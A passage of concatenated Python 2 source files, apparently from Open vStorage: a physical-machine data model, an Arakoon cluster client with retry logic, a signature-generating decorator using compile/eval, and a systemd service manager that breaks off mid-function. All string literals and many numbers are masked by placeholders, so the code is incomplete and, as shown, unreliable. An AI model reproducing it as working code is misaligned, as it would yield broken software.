from ovs.extensions.hypervisor.factory import Factory


class PMachine(DataObject):
    """Hybrid model for a physical machine (hypervisor host).

    Declares the persisted properties, a relation to an optional management
    center and one dynamic property that queries the host's live status.
    """
    # Persisted attributes. One masked property is an enum (list of allowed
    # values) — presumably the hypervisor type; masked literals prevent
    # confirming which. Optional fields are marked mandatory=False.
    __properties = {Property('<STR_LIT:name>', str, doc='<STR_LIT>'),
                    Property('<STR_LIT:description>', str, mandatory=False, doc='<STR_LIT>'),
                    Property('<STR_LIT:username>', str, doc='<STR_LIT>'),
                    Property('<STR_LIT:password>', str, mandatory=False, doc='<STR_LIT>'),
                    Property('<STR_LIT>', str, doc='<STR_LIT>'),
                    Property('<STR_LIT>', ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], doc='<STR_LIT>'),
                    Property('<STR_LIT>', str, mandatory=False, doc='<STR_LIT>')}
    # Optional link to a management center (one-to-many from MgmtCenter).
    __relations = [Relation('<STR_LIT>', MgmtCenter, '<STR_LIT>', mandatory=False)]
    # Dynamic (computed, cached) property backed by _host_status below.
    __dynamics = [Dynamic('<STR_LIT>', str, <NUM_LIT>)]

    def _host_status(self):
        """Return the host's status via the management center SDK.

        Lookup is done by hypervisor_id when available, otherwise by ip.
        Falls back to a (masked) default string when no management center
        SDK can be obtained or neither identifier is set.
        """
        mgmtcentersdk = Factory.get_mgmtcenter(self)
        if mgmtcentersdk:
            if self.hypervisor_id:
                return mgmtcentersdk.get_host_status_by_pk(self.hypervisor_id)
            if self.ip:
                return mgmtcentersdk.get_host_status_by_ip(self.ip)
        return '<STR_LIT>'
"""<STR_LIT>"""
from ovs.dal.datalist import DataList
from ovs.dal.hybrids.mgmtcenter import MgmtCenter


class MgmtCenterList(object):
    """Query helpers for MgmtCenter hybrid objects."""

    @staticmethod
    def get_mgmtcenters():
        """Return a DataList containing every management center (empty filter)."""
        query = {'<STR_LIT:type>': DataList.where_operator.AND,
                 '<STR_LIT>': []}
        return DataList(MgmtCenter, query)

    @staticmethod
    def get_by_ip(ip):
        """Return the first management center matching the given ip, or None."""
        query = {'<STR_LIT:type>': DataList.where_operator.AND,
                 '<STR_LIT>': [('<STR_LIT>', DataList.operator.EQUALS, ip)]}
        matches = DataList(MgmtCenter, query)
        return matches[0] if len(matches) > 0 else None
"""<STR_LIT>"""
"""<STR_LIT>"""
import sys
import time
import random
import threading
from ArakoonProtocol import *
from ArakoonProtocol import _packBool
from ArakoonExceptions import *
from ArakoonClientConnection import *
from ArakoonValidators import SignatureValidator
from ArakoonProtocol import ArakoonClientConfig
from functools import wraps
import utils

# Translation table for hex dumps: characters whose repr() is 3 chars long
# (i.e. printable) map to themselves, everything else to a (masked)
# placeholder. Python 2 style: str.translate() takes a 256-char table string.
FILTER = '<STR_LIT>'.join([(len(repr(chr(x))) == <NUM_LIT:3>) and chr(x) or '<STR_LIT:.>' for x in range(<NUM_LIT>)])


def dump(src, length=<NUM_LIT:8>):
    """Return a hex-dump style string of `src`, `length` bytes per row.

    Each row contains the running offset, the hex values of the slice and its
    printable rendering (non-printables replaced via FILTER).
    """
    N = <NUM_LIT:0>
    result = '<STR_LIT>'
    while src:
        # Peel off the next `length`-byte slice.
        s, src = src[:length], src[length:]
        hexa = '<STR_LIT:U+0020>'.join(["<STR_LIT>" % ord(x) for x in s])
        s = s.translate(FILTER)
        result += "<STR_LIT>" % (N, length * <NUM_LIT:3>, hexa, s)
        N += length
    return result


random.seed(time.time())


def retryDuringMasterReelection(is_read_only=False):
    """Decorator factory retrying a client call while the cluster re-elects
    a master.

    Retries on master-related / connection exceptions with a linearly growing
    backoff until ArakoonClientConfig.getNoMasterRetryPeriod() seconds pass.

    :param is_read_only: when False, ArakoonSocketException and
        ArakoonGoingDown are re-raised immediately instead of retried — the
        write may already have been applied server-side.
    """
    def wrap(f):
        @wraps(f)
        def retrying_f(self, *args, **kwargs):
            start = time.time()
            tryCount = <NUM_LIT:0.0>
            backoffPeriod = <NUM_LIT>
            callSucceeded = False
            retryPeriod = ArakoonClientConfig.getNoMasterRetryPeriod()
            deadline = start + retryPeriod
            while (not callSucceeded and time.time() < deadline):
                try:
                    retVal = f(self, *args, **kwargs)
                    callSucceeded = True
                except (ArakoonNoMaster, ArakoonNodeNotMaster, ArakoonSocketException, ArakoonNotConnected, ArakoonGoingDown) as ex:
                    # Non-read-only calls must not retry after socket-level
                    # failures: the update may already have been executed.
                    if not is_read_only and isinstance(ex, (ArakoonSocketException, ArakoonGoingDown)):
                        raise
                    if len(self._config.getNodes().keys()) == <NUM_LIT:0>:
                        raise ArakoonInvalidConfig("<STR_LIT>")
                    # Force a fresh master lookup on the next attempt.
                    self._masterId = None
                    self.dropConnections()
                    sleepPeriod = backoffPeriod * tryCount
                    if time.time() + sleepPeriod > deadline:
                        # Sleeping would overshoot the deadline: give up now.
                        raise
                    tryCount += <NUM_LIT:1.0>
                    ArakoonClientLogger.logWarning("<STR_LIT>" % (ex, sleepPeriod))
                    time.sleep(sleepPeriod)
            # NOTE(review): if the deadline expires before the first loop
            # iteration ever runs, `retVal` is unbound here (NameError).
            return retVal
        return retrying_f
    return wrap


class ArakoonClient:
    """Synchronous client for an Arakoon key-value cluster.

    Writes always go to the master node; reads go to the master unless dirty
    reads are allowed, in which case a designated node serves them. Node
    connections are cached and guarded by an internal re-entrant lock.
    """

    def __init__(self, config=None):
        """Create a client.

        :param config: ArakoonClientConfig describing the cluster nodes;
            a default-constructed config is used when None.
        :raises ArakoonInvalidConfig: when the config contains no nodes.
        """
        if config is None:
            config = ArakoonClientConfig()
        self._initialize(config)
        self.__lock = threading.RLock()
        self._masterId = None
        self._connections = dict()
        self._consistency = Consistent()
        nodeList = self._config.getNodes().keys()
        if len(nodeList) == <NUM_LIT:0>:
            raise ArakoonInvalidConfig("<STR_LIT>")
        # Node that will serve dirty (possibly stale) reads.
        self._dirtyReadNode = random.choice(nodeList)

    def allowDirtyReads(self):
        """Allow reads to be served without consistency guarantees."""
        self._consistency = NoGuarantee()

    def disallowDirtyReads(self):
        """Require consistent reads (served by the master)."""
        self._consistency = Consistent()

    def setConsistency(self, c):
        """Install an explicit consistency policy object for reads."""
        self._consistency = c

    def _initialize(self, config):
        # Kept separate so subclasses / tests can override configuration setup.
        self._config = config

    def __send__(self, msg):
        # Route: dirty reads to the dirty-read node, everything else to the
        # master. Returns the connection the reply can be decoded from.
        if self._consistency.isDirty():
            conn = self._sendMessage(self._dirtyReadNode, msg)
        else:
            conn = self._sendToMaster(msg)
        return conn

    @utils.update_argspec('<STR_LIT>', '<STR_LIT>')
    def setDirtyReadNode(self, node):
        """Select the node that serves dirty reads.

        :raises ArakoonUnknownNode: when `node` is not in the configuration.
        """
        if node not in self._config.getNodes().keys():
            raise ArakoonUnknownNode(node)
        self._dirtyReadNode = node

    @utils.update_argspec('<STR_LIT>')
    @retryDuringMasterReelection(is_read_only=True)
    def getKeyCount(self):
        """Return the number of keys in the cluster (decoded as int64)."""
        encoded = ArakoonProtocol.encodeGetKeyCount()
        conn = self._sendToMaster(encoded)
        return conn.decodeInt64Result()

    def getDirtyReadNode(self):
        """Return the node id currently used for dirty reads."""
        return self._dirtyReadNode

    @utils.update_argspec('<STR_LIT>', '<STR_LIT>', ('<STR_LIT>', '<STR_LIT>'))
    @retryDuringMasterReelection(is_read_only=True)
    @SignatureValidator('<STR_LIT:string>', '<STR_LIT:string>')
    def hello(self, clientId, clusterId='<STR_LIT>'):
        """Ping the master; return its string response."""
        encoded = ArakoonProtocol.encodePing(clientId, clusterId)
        conn = self._sendToMaster(encoded)
        return conn.decodeStringResult()

    def getVersion(self, nodeId=None):
        """Return version information of `nodeId` (the master when None)."""
        msg = ArakoonProtocol.encodeGetVersion()
        conn = None
        if nodeId is None:
            conn = self._sendToMaster(msg)
        else:
            conn = self._sendMessage(nodeId, msg)
        result = conn.decodeVersionResult()
        return result

    def getCurrentState(self, nodeId=None):
        """Return the current state string of `nodeId` (the master when None)."""
        msg = ArakoonProtocol.encodeGetCurrentState()
        conn = None
        if nodeId is None:
            conn = self._sendToMaster(msg)
        else:
            conn = self._sendMessage(nodeId, msg)
        result = conn.decodeStringResult()
        return result

    @utils.update_argspec('<STR_LIT>', '<STR_LIT:key>')
    @retryDuringMasterReelection(is_read_only=True)
    @SignatureValidator('<STR_LIT:string>')
    def exists(self, key):
        """Return True when `key` is present in the store."""
        msg = ArakoonProtocol.encodeExists(key, self._consistency)
        conn = self.__send__(msg)
        return conn.decodeBoolResult()

    @utils.update_argspec('<STR_LIT>', '<STR_LIT:key>')
    @retryDuringMasterReelection(is_read_only=True)
    @SignatureValidator('<STR_LIT:string>')
    def get(self, key):
        """Return the value stored under `key`."""
        msg = ArakoonProtocol.encodeGet(key, self._consistency)
        conn = self.__send__(msg)
        result = conn.decodeStringResult()
        return result

    @utils.update_argspec('<STR_LIT>', '<STR_LIT>')
    @retryDuringMasterReelection(is_read_only=True)
    def multiGet(self, keys):
        """Return the list of values for `keys`."""
        msg = ArakoonProtocol.encodeMultiGet(keys, self._consistency)
        conn = self.__send__(msg)
        result = conn.decodeStringListResult()
        return result

    @utils.update_argspec('<STR_LIT>', '<STR_LIT>')
    @retryDuringMasterReelection(is_read_only=True)
    def multiGetOption(self, keys):
        """Return values for `keys` decoded as a string-option array
        (missing keys presumably yield None — masked protocol details)."""
        msg = ArakoonProtocol.encodeMultiGetOption(keys, self._consistency)
        conn = self.__send__(msg)
        result = conn.decodeStringOptionArrayResult()
        return result

    @utils.update_argspec('<STR_LIT>', '<STR_LIT:key>', '<STR_LIT:value>')
    @retryDuringMasterReelection()
    @SignatureValidator('<STR_LIT:string>', '<STR_LIT:string>')
    def set(self, key, value):
        """Store `value` under `key` (always routed to the master)."""
        conn = self._sendToMaster(ArakoonProtocol.encodeSet(key, value))
        conn.decodeVoidResult()

    @retryDuringMasterReelection()
    def nop(self):
        """Send a NOP command to the master."""
        conn = self._sendToMaster(ArakoonProtocol.encodeNOP())
        conn.decodeVoidResult()

    @retryDuringMasterReelection()
    def get_txid(self):
        """Return the master's current transaction id result."""
        conn = self._sendToMaster(ArakoonProtocol.encodeGetTxid())
        result = conn.decodeGetTxidResult()
        return result

    @utils.update_argspec('<STR_LIT>', '<STR_LIT:key>', '<STR_LIT:value>')
    @retryDuringMasterReelection()
    @SignatureValidator('<STR_LIT:string>', '<STR_LIT:string>')
    def confirm(self, key, value):
        """Send the protocol's 'confirm' update for `key`/`value`."""
        msg = ArakoonProtocol.encodeConfirm(key, value)
        conn = self._sendToMaster(msg)
        conn.decodeVoidResult()

    @utils.update_argspec('<STR_LIT>', '<STR_LIT:key>', '<STR_LIT>')
    @retryDuringMasterReelection(is_read_only=True)
    @SignatureValidator('<STR_LIT:string>', '<STR_LIT>')
    def aSSert(self, key, vo):
        """Assert that `key` currently maps to value-option `vo`."""
        msg = ArakoonProtocol.encodeAssert(key, vo, self._consistency)
        conn = self.__send__(msg)
        result = conn.decodeVoidResult()
        return result

    @utils.update_argspec('<STR_LIT>', '<STR_LIT:key>')
    @retryDuringMasterReelection(is_read_only=True)
    @SignatureValidator('<STR_LIT:string>')
    def aSSert_exists(self, key):
        """Assert that `key` exists."""
        msg = ArakoonProtocol.encodeAssertExists(key, self._consistency)
        conn = self.__send__(msg)
        result = conn.decodeVoidResult()
        return result

    @utils.update_argspec('<STR_LIT>', '<STR_LIT>', ('<STR_LIT>', False))
    @retryDuringMasterReelection()
    @SignatureValidator('<STR_LIT>', '<STR_LIT:bool>')
    def sequence(self, seq, sync=False):
        """Execute a Sequence of updates on the master."""
        encoded = ArakoonProtocol.encodeSequence(seq, sync)
        conn = self._sendToMaster(encoded)
        conn.decodeVoidResult()

    def makeSequence(self):
        """Return a fresh, empty Sequence builder."""
        return Sequence()

    @utils.update_argspec('<STR_LIT>', '<STR_LIT:key>')
    @retryDuringMasterReelection()
    @SignatureValidator('<STR_LIT:string>')
    def delete(self, key):
        """Delete `key` on the master."""
        conn = self._sendToMaster(ArakoonProtocol.encodeDelete(key))
        conn.decodeVoidResult()

    @utils.update_argspec('<STR_LIT>', '<STR_LIT>')
    @retryDuringMasterReelection()
    @SignatureValidator('<STR_LIT:string>')
    def deletePrefix(self, prefix):
        """Delete keys matching `prefix`; returns the decoded int count."""
        msg = ArakoonProtocol.encodeDeletePrefix(prefix)
        conn = self._sendToMaster(msg)
        result = conn.decodeIntResult()
        return result

    # dict-like aliases so the client supports mapping syntax.
    __setitem__ = set
    __getitem__ = get
    __delitem__ = delete
    __contains__ = exists

    @utils.update_argspec('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                          '<STR_LIT>', ('<STR_LIT>', <NUM_LIT:1000>))
    @retryDuringMasterReelection(is_read_only=True)
    @SignatureValidator('<STR_LIT>', '<STR_LIT:bool>', '<STR_LIT>', '<STR_LIT:bool>', '<STR_LIT:int>')
    def range(self, beginKey, beginKeyIncluded, endKey, endKeyIncluded, maxElements=<NUM_LIT:1000>):
        """Return up to `maxElements` keys between beginKey and endKey,
        honoring the inclusion flags."""
        msg = ArakoonProtocol.encodeRange(beginKey, beginKeyIncluded, endKey,
                                          endKeyIncluded, maxElements, self._consistency)
        conn = self.__send__(msg)
        return conn.decodeStringListResult()

    @utils.update_argspec('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                          '<STR_LIT>', ('<STR_LIT>', <NUM_LIT:1000>))
    @retryDuringMasterReelection(is_read_only=True)
    @SignatureValidator('<STR_LIT>', '<STR_LIT:bool>', '<STR_LIT>', '<STR_LIT:bool>', '<STR_LIT:int>')
    def range_entries(self,
                      beginKey,
                      beginKeyIncluded,
                      endKey,
                      endKeyIncluded,
                      maxElements=<NUM_LIT:1000>):
        """Like range(), but returns (key, value) pairs."""
        msg = ArakoonProtocol.encodeRangeEntries(beginKey,
                                                 beginKeyIncluded,
                                                 endKey,
                                                 endKeyIncluded,
                                                 maxElements,
                                                 self._consistency)
        conn = self.__send__(msg)
        result = conn.decodeStringPairListResult()
        return result

    @utils.update_argspec('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                          '<STR_LIT>', ('<STR_LIT>', <NUM_LIT:1000>))
    @retryDuringMasterReelection(is_read_only=True)
    @SignatureValidator('<STR_LIT>', '<STR_LIT:bool>', '<STR_LIT>', '<STR_LIT:bool>', '<STR_LIT:int>')
    def rev_range_entries(self,
                          beginKey, beginKeyIncluded,
                          endKey, endKeyIncluded,
                          maxElements=<NUM_LIT:1000>):
        """Like range_entries(), but iterating in reverse order."""
        msg = ArakoonProtocol.encodeReverseRangeEntries(beginKey,
                                                        beginKeyIncluded,
                                                        endKey,
                                                        endKeyIncluded,
                                                        maxElements,
                                                        self._consistency)
        conn = self.__send__(msg)
        result = conn.decodeStringPairListResult()
        return result

    @utils.update_argspec('<STR_LIT>', '<STR_LIT>', ('<STR_LIT>', <NUM_LIT:1000>))
    @retryDuringMasterReelection(is_read_only=True)
    @SignatureValidator('<STR_LIT:string>', '<STR_LIT:int>')
    def prefix(self, keyPrefix, maxElements=<NUM_LIT:1000>):
        """Return up to `maxElements` keys starting with `keyPrefix`."""
        msg = ArakoonProtocol.encodePrefixKeys(keyPrefix, maxElements, self._consistency)
        conn = self.__send__(msg)
        return conn.decodeStringListResult()

    def whoMaster(self):
        """Return the current master's node id (resolving it when unknown)."""
        self._determineMaster()
        return self._masterId

    def expectProgressPossible(self):
        """Return the master's progress-possible flag; False when no master
        can be found at all."""
        msg = ArakoonProtocol.encodeExpectProgressPossible()
        try:
            conn = self._sendToMaster(msg)
            return conn.decodeBoolResult()
        except ArakoonNoMaster:
            return False

    def statistics(self):
        """Return the master's statistics structure."""
        msg = ArakoonProtocol.encodeStatistics()
        conn = self._sendToMaster(msg)
        return conn.decodeStatistics()

    @utils.update_argspec('<STR_LIT>', '<STR_LIT:key>', '<STR_LIT>', '<STR_LIT>')
    @retryDuringMasterReelection()
    @SignatureValidator('<STR_LIT:string>', '<STR_LIT>', '<STR_LIT>')
    def testAndSet(self, key, oldValue, newValue):
        """Conditionally set `key` to `newValue` (test-and-set protocol
        command); returns the decoded string-option result."""
        msg = ArakoonProtocol.encodeTestAndSet(key, oldValue, newValue)
        conn = self._sendToMaster(msg)
        return conn.decodeStringOptionResult()

    @utils.update_argspec('<STR_LIT>', '<STR_LIT:key>', '<STR_LIT>')
    @retryDuringMasterReelection()
    @SignatureValidator('<STR_LIT:string>', '<STR_LIT>')
    def replace(self, key, wanted):
        """Replace the value of `key` with `wanted`; returns the decoded
        string-option result."""
        msg = ArakoonProtocol.encodeReplace(key, wanted)
        conn = self._sendToMaster(msg)
        return conn.decodeStringOptionResult()

    @utils.update_argspec('<STR_LIT>', '<STR_LIT:name>', '<STR_LIT>')
    @retryDuringMasterReelection()
    @SignatureValidator('<STR_LIT:string>', '<STR_LIT>')
    def userFunction(self, name, argument):
        '''Invoke server-side user function `name` with `argument`.'''
        msg = ArakoonProtocol.encodeUserFunction(name, argument)
        conn = self._sendToMaster(msg)
        return conn.decodeStringOptionResult()

    @utils.update_argspec('<STR_LIT>')
    @retryDuringMasterReelection(is_read_only=True)
    def getNurseryConfig(self):
        # Fetch the nursery configuration from the master.
        msg = ArakoonProtocol.encodeGetNurseryCfg()
        con = self._sendToMaster(msg)
        return con.decodeNurseryCfgResult()

    def dropConnections(self):
        '''Close and forget every cached node connection.'''
        # Python 2: .keys() returns a list, so deleting entries while
        # iterating this snapshot is safe.
        keysToRemove = self._connections.keys()
        for key in keysToRemove:
            self._connections[key].close()
            del self._connections[key]

    def _determineMaster(self):
        # Ask nodes (in random order) who the master is; a node naming
        # another node as master is only trusted once that node confirms its
        # own mastership.
        nodeIds = []
        if self._masterId is None:
            nodeIds = self._config.getNodes().keys()
            random.shuffle(nodeIds)
        while self._masterId is None and len(nodeIds) > <NUM_LIT:0>:
            node = nodeIds.pop()
            try:
                self._masterId = self._getMasterIdFromNode(node)
                tmpMaster = self._masterId
                try:
                    if self._masterId is not None:
                        if self._masterId != node and not self._validateMasterId(self._masterId):
                            # Claimed master did not confirm: keep searching.
                            self._masterId = None
                    else:
                        ArakoonClientLogger.logWarning("<STR_LIT>", node)
                except Exception, ex:
                    ArakoonClientLogger.logWarning("<STR_LIT>", tmpMaster)
                    ArakoonClientLogger.logDebug("<STR_LIT>" % (ex.__class__.__name__, ex))
                    self._masterId = None
            except Exception, ex:
                # Node unreachable / protocol error: try the next node.
                ArakoonClientLogger.logWarning("<STR_LIT>", node)
                ArakoonClientLogger.logDebug("<STR_LIT>" % (ex.__class__.__name__, ex))
        if self._masterId is None:
            ArakoonClientLogger.logError("<STR_LIT>")
            raise ArakoonNoMaster()

    def _sendToMaster(self, msg):
        # Resolve the master and forward the message to it.
        self._determineMaster()
        retVal = self._sendMessage(self._masterId, msg)
        if retVal is None:
            raise ArakoonNoMasterResult()
        return retVal

    def _validateMasterId(self, masterId):
        # A master id is valid when that node itself claims to be master.
        if masterId is None:
            return False
        otherMasterId = self._getMasterIdFromNode(masterId)
        return masterId == otherMasterId

    def _getMasterIdFromNode(self, nodeId):
        # Ask a single node who it believes the master is (string option).
        conn = self._sendMessage(nodeId, ArakoonProtocol.encodeWhoMaster())
        masterId = conn.decodeStringOptionResult()
        return masterId

    def _sleep(self, timeout):
        # Thin wrapper around time.sleep (overridable seam).
        time.sleep(timeout)

    def _sendMessage(self, nodeId, msgBuffer, tryCount=-<NUM_LIT:1>):
        """Send `msgBuffer` to `nodeId` with up to `tryCount` attempts
        (-1 means: use the configured try count) and randomized backoff
        between retries; returns the connection on success."""
        result = None
        if tryCount == -<NUM_LIT:1>:
            tryCount = self._config.getTryCount()
        for i in range(tryCount):
            if i > <NUM_LIT:0>:
                # Random backoff that grows with the attempt number.
                maxSleep = i * ArakoonClientConfig.getBackoffInterval()
                self._sleep(random.randint(<NUM_LIT:0>, maxSleep))
            with self.__lock:
                try:
                    connection = self._getConnection(nodeId)
                    connection.send(msgBuffer)
                    result = connection
                    break
                except Exception, ex:
                    fmt = "<STR_LIT>"
                    ArakoonClientLogger.logWarning(fmt, i, nodeId,
                                                   ex.__class__.__name__, ex)
                    # Drop the broken connection and force a master re-lookup.
                    self._connections[nodeId].close()
                    del self._connections[nodeId]
                    self._masterId = None
        if result is None:
            # Bare raise outside an except block: relies on Python 2
            # re-raising the last exception handled above.
            raise
        return result

    def _getConnection(self, nodeId):
        # Return the cached connection for `nodeId`, creating it on first use.
        connection = None
        if self._connections.has_key(nodeId):
            connection = self._connections[nodeId]
        if connection is None:
            nodeLocations = self._config.getNodeLocations(nodeId)
            clusterId = self._config.getClusterId()
            connection = ArakoonClientConnection(nodeLocations, clusterId,
                                                 self._config)
            self._connections[nodeId] = connection
        return connection
'''<STR_LIT>'''
import __builtin__
import uuid
import functools
import itertools
from ovs.log.logHandler import LogHandler

LOGGER = LogHandler.get('<STR_LIT>', '<STR_LIT>', propagate=False)

'''<STR_LIT>'''


def update_argspec(*argnames):
    '''Decorator factory that gives a wrapped function an explicit argspec.

    Each entry in `argnames` is either a plain name or a (name, default)
    pair; a trailing (masked) generated entry is appended. A wrapper with
    exactly that signature is generated as source text, compiled and
    evaluated, and forwards its arguments to the original function.
    Presumably used so introspection-based tooling sees real parameter
    names on functions implemented via **kwargs — masked template strings
    prevent confirming the exact generated shape.
    '''
    argnames_ = tuple(itertools.chain(argnames, ('<STR_LIT>',)))
    # Minimal evaluation environment for the generated function definition.
    context = {
        '<STR_LIT>': None,
        '<STR_LIT>': __builtin__.dict,
        '<STR_LIT>': __builtin__.zip,
        '<STR_LIT:True>': True,
        '<STR_LIT:False>': False,
    }

    def _format(value):
        '''Render a default value as Python source for the generated def.'''
        if isinstance(value, unicode):
            return '<STR_LIT>' % value
        elif isinstance(value, str):
            return '<STR_LIT>' % value
        elif isinstance(value, bool):
            # bool must be tested before (int, long): bool is an int subclass.
            return '<STR_LIT:True>' if value else '<STR_LIT:False>'
        elif isinstance(value, (int, long)):
            return '<STR_LIT>' % value
        elif value is None:
            return '<STR_LIT:None>'
        else:
            # Only simple literal defaults are supported.
            raise TypeError

    def _generate_signature(args):
        '''Yield one signature fragment per argument (name or name=default).'''
        for arg in args:
            if isinstance(arg, str):
                yield '<STR_LIT:%s>' % arg
            else:
                arg, default = arg
                yield '<STR_LIT>' % (arg, _format(default))

    # Pre-render the three template pieces: full signature, plain argument
    # list and the (masked) per-argument forwarding fragments.
    template_signature = '<STR_LIT:U+002CU+0020>'.join(_generate_signature(argnames_))
    template_args = '<STR_LIT:U+002CU+0020>'.join(name if isinstance(name, str) else name[<NUM_LIT:0>] for name in argnames_) if argnames_ else '<STR_LIT>'
    template_argnames = '<STR_LIT:U+002CU+0020>'.join(
        '<STR_LIT>' % (name if isinstance(name, str) else name[<NUM_LIT:0>])
        for name in argnames_) if argnames_ else '<STR_LIT>'
    fun_def_template = '''<STR_LIT>''' % {
        '<STR_LIT>': template_signature,
        '<STR_LIT:args>': template_args,
        '<STR_LIT>': template_argnames,
    }

    def wrapper(fun):
        '''Generate, compile and return the signature-carrying wrapper.'''
        random_suffix = lambda: str(uuid.uuid4()).replace('<STR_LIT:->', '<STR_LIT>')
        # Pick internal helper names guaranteed not to collide with argnames.
        orig_function_name = None
        while (not orig_function_name) or (orig_function_name in argnames_):
            orig_function_name = '<STR_LIT>' % random_suffix()
        kwargs_name = None
        while (not kwargs_name) or (kwargs_name in argnames_):
            kwargs_name = '<STR_LIT>' % random_suffix()
        fun_def = fun_def_template % {
            '<STR_LIT:name>': fun.__name__,
            '<STR_LIT>': orig_function_name,
            '<STR_LIT>': kwargs_name,
        }
        code = compile(fun_def, '<STR_LIT>', '<STR_LIT>', <NUM_LIT:0>, <NUM_LIT:1>)
        env = context.copy()
        env[orig_function_name] = fun
        # Executing the compiled `def` binds the wrapper inside `env`.
        eval(code, env, env)
        fun_wrapper = env[fun.__name__]
        updated = functools.update_wrapper(fun_wrapper, fun)
        return updated
    return wrapper


def format_doc(doc):
    '''Return `doc` as unicode with per-line leading/trailing space stripped.'''
    if isinstance(doc, str):
        doc = doc.decode('<STR_LIT:utf-8>')
    return u'<STR_LIT:\n>'.join(line.strip() for line in doc.splitlines())


def kill_coroutine(coroutine, log_fun=None):
    '''Close a coroutine, swallowing any error (best-effort cleanup).

    Failures while closing are logged through `log_fun` when given; errors
    raised by the logger itself are ignored as well.
    '''
    try:
        coroutine.close()
    except:
        try:
            if log_fun:
                log_fun('<STR_LIT>')
        except:
            pass


def process_blocking(message, stream):
    '''Serialize `message` onto `stream`, then block for its decoded reply.'''
    for bytes_ in message.serialize():
        stream.write(bytes_)
    return read_blocking(message.receive(), stream.read)


def read_blocking(receiver, read_fun):
    '''Drive the `receiver` coroutine with bytes from `read_fun` until it
    yields a protocol.Result; return the result's value.

    :raises TypeError: when the coroutine yields something that is neither
        a Request nor a Result.
    '''
    # Imported locally — presumably to avoid a circular import at load time.
    from ovs.extensions.db.arakoon.pyrakoon.pyrakoon import protocol
    request = receiver.next()
    while isinstance(request, protocol.Request):
        # The coroutine asks for `count` bytes; feed them back in.
        value = read_fun(request.count)
        request = receiver.send(value)
    if not isinstance(request, protocol.Result):
        raise TypeError
    kill_coroutine(receiver, LOGGER.exception)
    return request.value
<s> """<STR_LIT>""" </s>
"""<STR_LIT>"""
from subprocess import CalledProcessError
from ovs.log.logHandler import LogHandler

logger = LogHandler.get('<STR_LIT>', name='<STR_LIT>')


class Systemd(object):
    """Manage services on a systemd-based node through a remote client.

    All shell commands run via `client.run` and all unit files are touched
    via the client's file_* helpers, so `client` is presumably an SSH-style
    remote client — confirm against callers.
    """

    @staticmethod
    def _service_exists(name, client, path):
        # A service exists when its unit file is present at `path`
        # (a masked default path is used when None).
        if path is None:
            path = '<STR_LIT>'
        file_to_check = '<STR_LIT>'.format(path, name)
        return client.file_exists(file_to_check)

    @staticmethod
    def _get_name(name, client, path=None):
        """Resolve `name` to the actual unit name.

        Tries: the given path, a (masked) default location, then a (masked)
        prefixed/suffixed variant of the name.

        :raises ValueError: when no matching unit file is found.
        """
        if Systemd._service_exists(name, client, path):
            return name
        if Systemd._service_exists(name, client, '<STR_LIT>'):
            return name
        name = '<STR_LIT>'.format(name)
        if Systemd._service_exists(name, client, path):
            return name
        logger.info('<STR_LIT>'.format(name))
        raise ValueError('<STR_LIT>'.format(name))

    @staticmethod
    def add_service(name, client, params=None, target_name=None, additional_dependencies=None):
        """Install a service from its template unit file.

        Substitutes `params` placeholders and optional extra dependencies in
        the template, writes the unit file (under `target_name` when given),
        then reloads systemd and runs a follow-up command for the unit.
        Silently returns when no template file exists.

        :raises Exception: when either remote command fails.
        """
        if params is None:
            params = {}
        name = Systemd._get_name(name, client, '<STR_LIT>')
        template_service = '<STR_LIT>'
        if not client.file_exists(template_service.format(name)):
            # No template available: nothing to install.
            return
        template_file = client.file_read(template_service.format(name))
        # Substitute caller-provided placeholder values (Python 2 iteritems).
        for key, value in params.iteritems():
            template_file = template_file.replace('<STR_LIT>'.format(key), value)
        if '<STR_LIT>' in template_file:
            # Template contains a (masked) service-name placeholder.
            service_name = name if target_name is None else target_name
            template_file = template_file.replace('<STR_LIT>', service_name.lstrip('<STR_LIT>'))
            template_file = template_file.replace('<STR_LIT>', '<STR_LIT>')
        # Build the (masked) dependency clause from the extra services.
        dependencies = '<STR_LIT>'
        if additional_dependencies:
            for service in additional_dependencies:
                dependencies += '<STR_LIT>'.format(service)
        template_file = template_file.replace('<STR_LIT>', dependencies)
        if target_name is None:
            client.file_write('<STR_LIT>'.format(name), template_file)
        else:
            client.file_write('<STR_LIT>'.format(target_name), template_file)
            name = target_name
        try:
            client.run('<STR_LIT>')
            client.run('<STR_LIT>'.format(name))
        except CalledProcessError as cpe:
            output = cpe.output
            logger.error('<STR_LIT>'.format(name, output))
            raise Exception('<STR_LIT>'.format(name, output))

    @staticmethod
    def get_service_status(name, client, return_output=False):
        """Return a boolean service state derived from the status command's
        output; with `return_output` the raw output is returned as well.

        The two compared literals are masked — presumably active/inactive
        markers; confirm against the deployed unit tooling.
        """
        name = Systemd._get_name(name, client)
        output = client.run('<STR_LIT>'.format(name))
        if '<STR_LIT>' == output:
            if return_output is True:
                return True, output
            return True
        if '<STR_LIT>' == output:
            if return_output is True:
                return False, output
            return False
        # NOTE(review): unrecognized output falls through to the exact same
        # result as the negative branch above — the duplication is redundant.
        if return_output is True:
            return False, output
        return False

    @staticmethod
    def remove_service(name, client):
        """Delete the unit file and reload systemd."""
        name = Systemd._get_name(name, client)
        client.file_delete('<STR_LIT>'.format(name))
        client.run('<STR_LIT>')

    @staticmethod
    def disable_service(name, client):
        """Disable the unit; raises Exception on command failure."""
        name = Systemd._get_name(name, client)
        try:
            client.run('<STR_LIT>'.format(name))
        except CalledProcessError as cpe:
            output = cpe.output
            logger.error('<STR_LIT>'.format(name, output))
            raise Exception('<STR_LIT>'.format(name, output))

    @staticmethod
    def enable_service(name, client):
        """Enable the unit; raises Exception on command failure."""
        name = Systemd._get_name(name, client)
        try:
            client.run('<STR_LIT>'.format(name))
        except CalledProcessError as cpe:
            output = cpe.output
            logger.error('<STR_LIT>'.format(name, output))
            raise Exception('<STR_LIT>'.format(name, output))

    @staticmethod
    def start_service(name, client):
        """Start the unit unless its status is already positive.

        Returns the command output; command failures are logged, not raised.
        """
        status, output = Systemd.get_service_status(name, client, True)
        if status is True:
            return output
        try:
            name = Systemd._get_name(name, client)
            output = client.run('<STR_LIT>'.format(name))
        except CalledProcessError as cpe:
            output = cpe.output
            logger.error('<STR_LIT>'.format(name, output))
        return output

    @staticmethod
    def stop_service(name, client):
        """Stop the unit unless its status is already negative.

        Returns the command output; command failures are logged, not raised.
        """
